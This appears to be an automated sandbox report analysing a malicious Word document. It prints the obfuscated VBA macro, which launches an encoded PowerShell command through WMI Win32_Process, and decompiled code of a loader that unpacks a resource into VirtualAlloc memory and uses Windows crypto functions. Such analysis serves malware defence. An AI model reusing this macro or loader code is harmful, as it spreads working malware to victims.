                61 | YGuUZX = DkkCTnu * CDate(mQZoi014) / uNL_Qm / EhPXLwZr + (fzbTzG6 / CStr(T6H6cL) / 3 * CStr(U4kTbL8o)) | DkkCTnu, CDate, mQZoi014, uNL_Qm, EhPXLwZr, fzbTzG6, CStr, T6H6cL, U4kTbL8o
                62 | For Each SFnP24Y in rkbEFdX | rkbEFdX
                63 | wnwME5Aw = Iofqhj - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(fIDOjLzQ) - 6977 - qf2EbLqm - AuOCYR * Sin(R65fhvwm) | Iofqhj, ChrW, Oct, CDate, Fix, fIDOjLzQ, qf2EbLqm, AuOCYR, Sin, R65fhvwm
                64 | Next | rkbEFdX
                65 | Loop Until FnZwmD_A = KUA7zY | FnZwmD_A, KUA7zY
                66 | On Error Resume Next |
                67 | Set mna = xqmm6672 | xqmm6672
                68 | Do | hfW56jn, FJHJlhv
                69 | If ls9iOFd = EnzDZGz Then | ls9iOFd, EnzDZGz
                70 | iYU6MXV = Tan(1141) | Tan
                71 | Endif |
                72 | JK1i0j = AtZoc6 * CDate(uDNHZRDB) / MLzjlI / OuoioTjO + (h0IdWK / CStr(Gtz6Hz) / 3 * CStr(NWWiIQQi)) | AtZoc6, CDate, uDNHZRDB, MLzjlI, OuoioTjO, h0IdWK, CStr, Gtz6Hz, NWWiIQQi
                73 | For Each FWa6lK in S10zzpNS | S10zzpNS
                74 | FXnzwzC = j7Ysl2IC - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(LInuIc64) - 6977 - jR1PlbP - cn3bSi * Sin(GY7qmRZw) | j7Ysl2IC, ChrW, Oct, CDate, Fix, LInuIc64, jR1PlbP, cn3bSi, Sin, GY7qmRZw
                75 | Next | S10zzpNS
                76 | Loop Until hfW56jn = FJHJlhv | hfW56jn, FJHJlhv
                77 | End Function |

                Module: ThisDocument

                Declaration
                Line | Content
                1 | Attribute VB_Name = "ThisDocument"
                2 | Attribute VB_Base = "1Normal.ThisDocument"
                3 | Attribute VB_GlobalNameSpace = False
                4 | Attribute VB_Creatable = False
                5 | Attribute VB_PredeclaredId = True
                6 | Attribute VB_Exposed = True
                7 | Attribute VB_TemplateDerived = True
                8 | Attribute VB_Customizable = True
                9 | Attribute VB_Control = "FikbdQZ, 0, 0, MSForms, TextBox"
                10 | Attribute VB_Control = "N2SpOiID, 1, 1, MSForms, TextBox"
                11 | Attribute VB_Control = "mwXI7m, 2, 2, MSForms, TextBox"
                12 | Attribute VB_Control = "P83AcXTu, 3, 3, MSForms, TextBox"
                13 | Attribute VB_Control = "QFa7Tzv, 4, 4, MSForms, TextBox"
                14 | Attribute VB_Control = "TCRM9sqj, 5, 5, MSForms, TextBox"
                15 | Attribute VB_Control = "VEYjp2, 6, 6, MSForms, TextBox"
                16 | Attribute VB_Control = "VHfL_K2S, 7, 7, MSForms, TextBox"
                17 | Attribute VB_Control = "w6kwiq, 8, 8, MSForms, TextBox"
                18 | Attribute VB_Control = "hjjzVw, 9, 9, MSForms, TextBox"
                19 | Attribute VB_Control = "cZDuVz, 10, 10, MSForms, TextBox"
                20 | Attribute VB_Control = "JSEp1Hh, 11, 11, MSForms, TextBox"
                21 | Attribute VB_Control = "uXSvzY, 12, 12, MSForms, TextBox"
                22 | Attribute VB_Control = "GoWsRhk, 13, 13, MSForms, TextBox"
                23 | Attribute VB_Control = "zJWspwz, 14, 14, MSForms, TextBox"
                24 | Attribute VB_Control = "kE4iQQr, 15, 15, MSForms, TextBox"
                25 | Attribute VB_Control = "TRF9Wz, 16, 16, MSForms, TextBox"
                26 | Attribute VB_Control = "qijkYG, 17, 17, MSForms, TextBox"
                27 | Attribute VB_Control = "btn5hVS, 18, 18, MSForms, TextBox"
                28 | Attribute VB_Control = "GUl0LE, 19, 19, MSForms, TextBox"

                Module: snLF1V

                Declaration
                Line | Content
                1 | Attribute VB_Name = "snLF1V"

                Executed Functions
                APIs | Meta Information


                Create

                SWbemObjectEx.Create("powershell -encod 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",,,) -> 0


                Part of subcall function R3tnEz2D@JIodCjfv: OuoioTjO

                Part of subcall function R3tnEz2D@JIodCjfv: h0IdWK

                Part of subcall function R3tnEz2D@JIodCjfv: CStr

                Part of subcall function R3tnEz2D@JIodCjfv: Gtz6Hz

                Part of subcall function R3tnEz2D@JIodCjfv: NWWiIQQi

                Part of subcall function R3tnEz2D@JIodCjfv: S10zzpNS

                Part of subcall function R3tnEz2D@JIodCjfv: j7Ysl2IC

                Part of subcall function R3tnEz2D@JIodCjfv: ChrW

                Part of subcall function R3tnEz2D@JIodCjfv: Oct

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: Fix

                Part of subcall function R3tnEz2D@JIodCjfv: LInuIc64

                Part of subcall function R3tnEz2D@JIodCjfv: jR1PlbP

                Part of subcall function R3tnEz2D@JIodCjfv: cn3bSi

                Part of subcall function R3tnEz2D@JIodCjfv: Sin

                Part of subcall function R3tnEz2D@JIodCjfv: GY7qmRZw

                Part of subcall function R3tnEz2D@JIodCjfv: hfW56jn

                Part of subcall function R3tnEz2D@JIodCjfv: FJHJlhv

                khjUo3du

                xqmm6672

                wWOoNnTo

                MSfBRT

                Tan

                z5liGH

                CDate

                TuYSA6

                KWit9B

                tqXjFCw

                pSZQnNn

                CStr

                wT5D9BcE

                wMR9tP

                LDjJ6zM

                bUqA9z5

                ChrW

                Oct

                CDate

                Fix

                jYQWvaN

                vDZE63w

                UYGTL2Tr

                Sin

                CmXBWjb

                X975_m

                zcazMGDf

                xqmm6672

                Pu1R8IUO

                aXF2_4qQ

                Tan

                tcDLLb

                CDate

                lsaWRUr

                ShWp3jNB

                tnXUzJ0O

                MM3V6h

                CStr

                GdQwslU

                j_72KM

                HpAvVal

                cLEAWn

                ChrW

                Oct

                CDate

                Fix

                lA6KKk

                J3J3pfPR

                hzkYTP82

                Sin

                cISYkJs

                Sff8wzaz

                B8wUj_W

                Strings | Decrypted Strings
                "IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3"
                Line | Instruction | Meta Information
                2

                Function dztj37()

                3

                On Error Resume Next

                executed
                4

                Set mna = xqmm6672

                xqmm6672

                5

                Do

                PcG7it_

                zir7hM

                6

                If M3oCwG = PFAGKSc Then

                M3oCwG

                PFAGKSc

                7

                HnhIwa = Tan(1141)

                Tan

                8

                Endif

                9

                R6wTtT = Btc0KuW * CDate(fCMUHn) / pUBdAcb / WLAEkzsu + (z5_aQ54 / CStr(q2NS516) / 3 * CStr(uBRAVT))

                Btc0KuW

                CDate

                fCMUHn

                pUBdAcb

                WLAEkzsu

                z5_aQ54

                CStr

                q2NS516

                uBRAVT

                10

                For Each jMCQik in tkw6vj

                tkw6vj

                11

                CzAN5H = oc2GT0i - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(FRqJIU) - 6977 - MAPHFj - A9hSFQf9 * Sin(Bt4u6CG)

                oc2GT0i

                ChrW

                Oct

                CDate

                Fix

                FRqJIU

                MAPHFj

                A9hSFQf9

                Sin

                Bt4u6CG

                12

                Next

                tkw6vj

                13

                Loop Until PcG7it_ = zir7hM

                PcG7it_

                zir7hM

                14

                kMmT3s = vq219c + UMvDUH(ThisDocument.zJWspwz + ThisDocument.VHfL_K2S) + YAHvQ_

                vq219c

                zJWspwz

                VHfL_K2S

                YAHvQ_

                15

                On Error Resume Next

                16

                Set mna = xqmm6672

                xqmm6672

                17

                Do

                lnY3HW

                jXUw9Oz

                18

                If LXv84MXp = JSjBjs Then

                LXv84MXp

                JSjBjs

                19

                rZcdZKRX = Tan(1141)

                Tan

                20

                Endif

                21

                wD6C32mJ = TAw0Fzm * CDate(C0DzNIbd) / dpjKqtAS / iaXsMY1 + (TniCd0t / CStr(k5bY2L) / 3 * CStr(t1HQFfiz))

                TAw0Fzm

                CDate

                C0DzNIbd

                dpjKqtAS

                iaXsMY1

                TniCd0t

                CStr

                k5bY2L

                t1HQFfiz

                22

                For Each fVn1T1_ in BnCM82w

                BnCM82w

                23

                zQkMRi = ZNRIEN - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(Ghn4llZ) - 6977 - UF1nKaU6 - wDZDIUTV * Sin(L8Zz21)

                ZNRIEN

                ChrW

                Oct

                CDate

                Fix

                Ghn4llZ

                UF1nKaU6

                wDZDIUTV

                Sin

                L8Zz21

                24

                Next

                BnCM82w

                25

                Loop Until lnY3HW = jXUw9Oz

                lnY3HW

                jXUw9Oz

                27

                CreateObject(UMvDUH("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3")).Create kMmT3s, ZKnIZEfd, R3tnEz2D, khjUo3du

                SWbemObjectEx.Create("powershell -encod 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",,,) -> 0

                ZKnIZEfd

                khjUo3du

                executed
                28

                On Error Resume Next

                29

                Set mna = xqmm6672

                xqmm6672

                30

                Do

                X975_m

                zcazMGDf

                31

                If wWOoNnTo = MSfBRT Then

                wWOoNnTo

                MSfBRT

                32

                QvB9VD = Tan(1141)

                Tan

                33

                Endif

                34

                z8FYLah = z5liGH * CDate(TuYSA6) / KWit9B / tqXjFCw + (pSZQnNn / CStr(wT5D9BcE) / 3 * CStr(wMR9tP))

                z5liGH

                CDate

                TuYSA6

                KWit9B

                tqXjFCw

                pSZQnNn

                CStr

                wT5D9BcE

                wMR9tP

                35

                For Each mjHV7os in LDjJ6zM

                LDjJ6zM

                36

                XzsVHACu = bUqA9z5 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(jYQWvaN) - 6977 - vDZE63w - UYGTL2Tr * Sin(CmXBWjb)

                bUqA9z5

                ChrW

                Oct

                CDate

                Fix

                jYQWvaN

                vDZE63w

                UYGTL2Tr

                Sin

                CmXBWjb

                37

                Next

                LDjJ6zM

                38

                Loop Until X975_m = zcazMGDf

                X975_m

                zcazMGDf

                40

                On Error Resume Next

                41

                Set mna = xqmm6672

                xqmm6672

                42

                Do

                Sff8wzaz

                B8wUj_W

                43

                If Pu1R8IUO = aXF2_4qQ Then

                Pu1R8IUO

                aXF2_4qQ

                44

                EaYS6RQw = Tan(1141)

                Tan

                45

                Endif

                46

                nkfcdqD = tcDLLb * CDate(lsaWRUr) / ShWp3jNB / tnXUzJ0O + (MM3V6h / CStr(GdQwslU) / 3 * CStr(j_72KM))

                tcDLLb

                CDate

                lsaWRUr

                ShWp3jNB

                tnXUzJ0O

                MM3V6h

                CStr

                GdQwslU

                j_72KM

                47

                For Each mWYlNTFO in HpAvVal

                HpAvVal

                48

                iE7w_S0 = cLEAWn - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(lA6KKk) - 6977 - J3J3pfPR - hzkYTP82 * Sin(cISYkJs)

                cLEAWn

                ChrW

                Oct

                CDate

                Fix

                lA6KKk

                J3J3pfPR

                hzkYTP82

                Sin

                cISYkJs

                49

                Next

                HpAvVal

                50

                Loop Until Sff8wzaz = B8wUj_W

                Sff8wzaz

                B8wUj_W

                51

                End Function

                APIs | Meta Information


                Replace

                Replace("09NhI09NhuH09Nh309Nh","09Nh","") -> IuH3

                Replace("poweIuH3rsheIuH3ll -IuH3encoIuH3d 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,"IuH3","") -> powershell -encod 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

                Replace("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3","IuH3","") -> winmgmts:Win32_Process

                Replace(winmIuH3gmtsIuH3:WinIuH332_PIuH3roceIuH3ssStIuH3artuIuH3p,"IuH3","") -> winmgmts:Win32_ProcessStartup


                Strings | Decrypted Strings
                """"
                "09Nh"
                "09NhI09NhuH09Nh309Nh"
                Line | Instruction | Meta Information
                52

                Function UMvDUH(jNQUnno)

                53

                On Error Resume Next

                executed
                54

                Set mna = xqmm6672

                xqmm6672

                55

                Do

                Xb5lam

                diSWXniz

                56

                If CP2pOzYD = m_MLhXX Then

                CP2pOzYD

                m_MLhXX

                57

                UPMZSQ = Tan(1141)

                Tan

                58

                Endif

                59

                busmGEX = huhEoJG * CDate(az_UGd0) / a21jZbL3 / pn7zEK + (N0vGGku / CStr(fMoOoWO3) / 3 * CStr(EUG4z12))

                huhEoJG

                CDate

                az_UGd0

                a21jZbL3

                pn7zEK

                N0vGGku

                CStr

                fMoOoWO3

                EUG4z12

                60

                For Each d_7JYztz in nP1obkp

                nP1obkp

                61

                HRs8wo = HG0RQi - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(zqDQZ7) - 6977 - YjRQrq - Hz5p3D * Sin(mjjrHIf)

                HG0RQi

                ChrW

                Oct

                CDate

                Fix

                zqDQZ7

                YjRQrq

                Hz5p3D

                Sin

                mjjrHIf

                62

                Next

                nP1obkp

                63

                Loop Until Xb5lam = diSWXniz

                Xb5lam

                diSWXniz

                64

                UMvDUH = Replace(jNQUnno, Replace("09NhI09NhuH09Nh309Nh", "09Nh", ""), "")

                Replace("09NhI09NhuH09Nh309Nh","09Nh","") -> IuH3

                executed
                65

                On Error Resume Next

                66

                Set mna = xqmm6672

                xqmm6672

                67

                Do

                qaB0m7mo

                E9cRqzhV

                68

                If wMBYtY = O_vT8j Then

                wMBYtY

                O_vT8j

                69

                mEczi1 = Tan(1141)

                Tan

                70

                Endif

                71

                ViXQd2j8 = EqHGmqzs * CDate(p2VQvUjT) / nJES0LA / WiwqHbr + (XzCzPS7 / CStr(FfJUME) / 3 * CStr(wlzHbq))

                EqHGmqzs

                CDate

                p2VQvUjT

                nJES0LA

                WiwqHbr

                XzCzPS7

                CStr

                FfJUME

                wlzHbq

                72

                For Each HV_KNz in t3Fh05z

                t3Fh05z

                73

                w5XZFSu = aGJjAH - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(F97Z_Sb) - 6977 - Q0hGCzd - ojvDCQi * Sin(wNX30a)

                aGJjAH

                ChrW

                Oct

                CDate

                Fix

                F97Z_Sb

                Q0hGCzd

                ojvDCQi

                Sin

                wNX30a

                74

                Next

                t3Fh05z

                75

                Loop Until qaB0m7mo = E9cRqzhV

                qaB0m7mo

                E9cRqzhV

                76

                End Function


                  Execution Graph

                  Execution Coverage:5.1%
                  Dynamic/Decrypted Code Coverage:16.2%
                  Signature Coverage:3.8%
                  Total number of Nodes:655
                  Total number of Limit Nodes:27

                  Graph

30296->30297 30298 411963 _Error_objects 106 API calls 30297->30298 30299 41da3c 30298->30299 30307 41d704 30299->30307 30301 41da54 std::runtime_error::runtime_error 30301->30287 30303 41f599 ctype 96 API calls 30302->30303 30304 41747e 30303->30304 30304->30291 30305->30288 30310 420285 30307->30310 30311 41f599 ctype 96 API calls 30310->30311 30312 41d71d GetCursorPos 30311->30312 30312->30301 30374 420870 30313->30374 30317 42083d ctype 106 API calls 30316->30317 30318 4277ff 30317->30318 30379 41ffe4 30318->30379 30321 42083d ctype 106 API calls 30322 427814 30321->30322 30323 427831 30322->30323 30324 42781b 30322->30324 30326 42083d ctype 106 API calls 30323->30326 30393 42764d 110 API calls 4 library calls 30324->30393 30327 427836 30326->30327 30328 427842 GetModuleHandleW 30327->30328 30387 41dc8f 30327->30387 30330 427862 30328->30330 30331 427851 GetProcAddress 30328->30331 30330->30226 30332 4084f0 30330->30332 30331->30330 30410 4080a0 30332->30410 30335 4080a0 7 API calls 30336 408545 30335->30336 30337 4080a0 7 API calls 30336->30337 30338 40855a 30337->30338 30339 4080a0 7 API calls 30338->30339 30340 40856f 30339->30340 30341 4282cd _malloc 69 API calls 30340->30341 30342 4085b2 _memcpy_s 30341->30342 30419 408a20 30342->30419 30344 4085d9 std::runtime_error::runtime_error 30425 4081a0 30344->30425 30346 40860d 30431 4083f0 30346->30431 30350 4080a0 7 API calls 30354 40863a 30350->30354 30351 408739 30437 408810 69 API calls _Allocate 30351->30437 30353 408743 30355 408750 30353->30355 30360 408758 30353->30360 30356 4086a0 VirtualAlloc 30354->30356 30438 4065a0 108 API calls 30355->30438 30434 428b70 30356->30434 30439 411e2c ShowWindow 30360->30439 30362 4086ee _memcpy_s 30364 40871a 30362->30364 30436 41e32c 69 API calls 2 library calls 30362->30436 30363 4087c5 30440 408830 UpdateWindow 30363->30440 30364->30362 30366 4087cd 30441 408850 70 API calls 30366->30441 30368 4087d4 30442 408a60 69 API calls std::runtime_error::~runtime_error 
30368->30442 30370 4087f0 30371 427dff __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30370->30371 30372 40880b 30371->30372 30372->30226 30373->30225 30375 42083d ctype 106 API calls 30374->30375 30376 420875 30375->30376 30377 417474 ctype 96 API calls 30376->30377 30378 41d6b0 30377->30378 30378->30220 30394 41fee8 30379->30394 30382 42002a 30383 420031 SetLastError 30382->30383 30386 42003e 30382->30386 30383->30386 30385 4200de 30385->30321 30400 427dff 30386->30400 30388 42083d ctype 106 API calls 30387->30388 30389 41dc94 30388->30389 30390 41dcbc 30389->30390 30391 420285 ctype 96 API calls 30389->30391 30390->30328 30392 41dca0 GetCurrentThreadId SetWindowsHookExW 30391->30392 30392->30390 30393->30323 30395 41fef1 GetModuleHandleW 30394->30395 30396 41ff55 GetModuleFileNameW 30394->30396 30397 41ff05 30395->30397 30398 41ff0a GetProcAddress GetProcAddress GetProcAddress GetProcAddress 30395->30398 30396->30382 30396->30386 30408 413dd0 RaiseException __CxxThrowException@8 30397->30408 30398->30396 30401 427e07 30400->30401 30402 427e09 IsDebuggerPresent 30400->30402 30401->30385 30409 43294b 30402->30409 30405 42d569 SetUnhandledExceptionFilter UnhandledExceptionFilter 30406 42d586 __invoke_watson 30405->30406 30407 42d58e GetCurrentProcess TerminateProcess 30405->30407 30406->30407 30407->30385 30409->30405 30443 407f90 30410->30443 30412 408145 30413 407f90 GetPEB 30412->30413 30414 408162 30413->30414 30415 40816b LoadLibraryExW 30414->30415 30416 408184 30415->30416 30417 427dff __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30416->30417 30418 408194 30417->30418 30418->30335 30420 408a31 std::_String_base::_Xlen Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 30419->30420 30447 408b30 30420->30447 30422 408a45 30451 408ac0 30422->30451 30426 4081b1 30425->30426 30430 4081aa _memset 30425->30430 30427 4080a0 7 API calls 30426->30427 30428 4081c0 30427->30428 30429 4282cd _malloc 69 API calls 
30428->30429 30428->30430 30429->30430 30430->30346 30432 4080a0 7 API calls 30431->30432 30433 408405 30432->30433 30433->30350 30433->30362 30435 4086c7 VirtualAlloc 30434->30435 30435->30362 30436->30351 30437->30353 30438->30360 30439->30363 30440->30366 30441->30368 30442->30370 30446 407f70 GetPEB 30443->30446 30445 407f9b 30445->30412 30446->30445 30448 408b41 std::runtime_error::~runtime_error 30447->30448 30449 408b43 30447->30449 30448->30422 30449->30448 30455 409160 69 API calls 2 library calls 30449->30455 30452 408ad0 std::_String_base::_Xlen 30451->30452 30456 408bd0 30452->30456 30454 408a51 30454->30344 30455->30448 30457 408be3 std::_String_base::_Xlen 30456->30457 30458 408c0a 30457->30458 30459 408bea std::runtime_error::runtime_error 30457->30459 30466 408e10 70 API calls 3 library calls 30458->30466 30465 408c60 70 API calls 2 library calls 30459->30465 30462 408c08 std::runtime_error::~runtime_error 30462->30454 30463 408c18 std::runtime_error::runtime_error 30463->30462 30467 409160 69 API calls 2 library calls 30463->30467 30465->30462 30466->30463 30467->30462 30471 439ad1 30472 411963 _Error_objects 106 API calls 30471->30472 30473 439adb 30472->30473 30474 42914d _Error_objects 76 API calls 30473->30474 30475 439b3c 30474->30475 30482 41cc36 30483 41cc44 30482->30483 30486 41cb71 30483->30486 30487 41cba7 30486->30487 30489 41cc2e 30486->30489 30488 41cba8 RegOpenKeyExW 30487->30488 30487->30489 30490 41cbc5 RegQueryValueExW 30487->30490 30491 41cc17 RegCloseKey 30487->30491 30488->30487 30490->30487 30491->30487 30492 439cfb 30497 437b72 30492->30497 30494 439d05 30495 42914d _Error_objects 76 API calls 30494->30495 30496 439d0f 30495->30496 30501 429338 30497->30501 30499 437b7e InitializeCriticalSection 30500 437ba2 __locking 30499->30500 30500->30494 30501->30499 30502 439c39 30503 439c45 30502->30503 30504 42914d _Error_objects 76 API calls 30503->30504 30505 439c71 30504->30505

                  Executed Functions

                  C-Code - Quality: 100%
                  			E0042B721() {
                  
                  				SetUnhandledExceptionFilter(E0042B6DF); // executed
                  				return 0;
                  			}




                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002B6DF), ref: 0042B726
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: e34121512207d3df35726db4ee6287cc3aab959369eef7ca889ae8497b46d98f
                  • Instruction ID: 9e57d53febc17cb01723d5703a190261370daaf70e790823c484ba6701aab5cc
                  • Opcode Fuzzy Hash: e34121512207d3df35726db4ee6287cc3aab959369eef7ca889ae8497b46d98f
                  • Instruction Fuzzy Hash: 569002A03A11514B4A401B707C0E60527909B48712B9154616061D4155DB984450599B
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction ID: 7070a3fe0fa6086c9f551fd7d8a3c6d336b33c2bbac2948b2fddc9a39b339380
                  • Opcode Fuzzy Hash: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction Fuzzy Hash: AD90023E71647612024577E0255A98AB8443DE27407454105E002000C24E1095789D37
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction ID: 4970d059c64eabd8cadc72362520ff4cebec4b1247c0ff7bde963a516075ea7b
                  • Opcode Fuzzy Hash: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction Fuzzy Hash: F590027FA4083251124177E1252BD8AAD043FF3B407455105A081000830C0127549137
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction ID: e63b4e34290f6787f2b5c59844ac9c81775d11f171bb365ce12df9ec5d80bfc1
                  • Opcode Fuzzy Hash: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction Fuzzy Hash: 3090023E1004265222017FF4242EB8A68003FEA740F894601A14A405935D101550E437
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction ID: ba0796ec6fea80fde8450659bca55a5a762ef2204f9c8da2008d107045c4a71f
                  • Opcode Fuzzy Hash: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction Fuzzy Hash: C090023F60042652030077E0387AF8A69447DF67907464109E005505835D005550A037
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.297130492.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_4f0000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $!$!$#$$$'$+$-$.$.$1$2$2$3$5$5$5$5$6$6$8$:$<$<$=$>$>$?$A$A$A$B$B$CryptAcquireContextA$CryptEncrypt$CryptImportKey$D$E$H$H$I$J$K$K$L$L$M$N$R$R$R$R$S$S$V$W$W$[$[$[$\$\$`$`$a$advapi32.dll$c$d$e$e$e$e$e$e$g$g$g$h$h$i$i$k$k$n$n$o$p$p$q$q$r$s$s$s$t$t$t$u$u$u$u$u$v$x$x$x$}$}$}$~$~$~
                  • API String ID: 0-3394408708
                  • Opcode ID: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction ID: 2f5a9deaf9fbb80638ca4a23065e0e4be220c43e7066a38862c2380f56b9cc9b
                  • Opcode Fuzzy Hash: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction Fuzzy Hash: C792572090C7DDD9EB32C6788C587DEBEB11B27314F0841D9D1D82A2D2C7BA1B85DB66
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 74%
                  			E004084F0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _v8;
                  				char _v16;
                  				void* _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				void* _v32;
                  				intOrPtr _v36;
                  				char* _v40;
                  				long _v44;
                  				signed int _v48;
                  				char _v76;
                  				char* _v80;
                  				long _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				void* _v100;
                  				intOrPtr _v104;
                  				void* _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				void* _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr* _v144;
                  				intOrPtr _v148;
                  				char _v149;
                  				intOrPtr _v156;
                  				void* _v160;
                  				signed int _t105;
                  				signed int _t106;
                  				intOrPtr _t118;
                  				void* _t122;
                  				void* _t123;
                  				void* _t125;
                  				intOrPtr _t140;
                  				void* _t152;
                  				signed int _t202;
                  				void* _t203;
                  				void* _t211;
                  				void* _t213;
                  
                  				_t217 = __eflags;
                  				_t201 = __esi;
                  				_t200 = __edi;
                  				_t157 = __ebx;
                  				_t105 =  *0x44c364; // 0xa6e2bca1
                  				_t106 = _t105 ^ _t202;
                  				_v48 = _t106;
                  				 *[fs:0x0] =  &_v16;
                  				_v140 = __ecx;
                  				_v96 = E004080A0(__ebx, __edi, __esi, __eflags, L"kernel32.dll", "FindResourceA");
                  				_v112 = E004080A0(__ebx, __edi, __esi, _t217, L"kernel32.dll", "LoadResource");
                  				_v104 = E004080A0(__ebx, __edi, __esi, _t217, L"kernel32.dll", "SizeofResource");
                  				_v92 = E004080A0(__ebx, __edi, __esi, _t217, L"kernel32.dll", "LockResource");
                  				_v24 = _v96(0, 0xaf, "VERTKS", _t106,  *[fs:0x0], E00438762, 0xffffffff);
                  				_v88 = _v112(0, _v24);
                  				_v84 = _v104(0, _v24);
                  				_v28 = _v92(_v88);
                  				_t118 = E004282CD(_t157, _v88, _t200, _v84); // executed
                  				_v36 = _t118;
                  				E00428B70(_t157, _t200, _t201, _v36, _v28, _v84);
                  				E00408A20( &_v76, "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");
                  				_v8 = 0;
                  				_v100 = 0;
                  				_v44 = 0;
                  				_t122 = E00408AA0( &_v76);
                  				_t123 = E00408A80( &_v76);
                  				_t188 =  &_v100;
                  				E004081A0(_t157,  &_v44, _t201,  &_v100,  &_v44, _t123, _t122); // executed
                  				_t211 = _t203 - 0x90 + 0x40;
                  				_v40 = "P7v06hvh#KAn}25";
                  				_v80 = "x9*sKGTni9T6EWRbP1*M4~fLxMWBU1mHsFZEja5$";
                  				_t125 = E004083F0(_t217); // executed
                  				_t218 = _t125;
                  				if(_t125 == 0) {
                  					_t140 = E004080A0(_t157, _t200, _t201, _t218, L"kernel32.dll", "VirtualAlloc");
                  					_t213 = _t211 + 8;
                  					_v120 = _t140;
                  					_v144 = _v80;
                  					_v148 = _v144 + 1;
                  					do {
                  						_v149 =  *_v144;
                  						_v144 = _v144 + 1;
                  					} while (_v149 != 0);
                  					_v156 = _v144 - _v148;
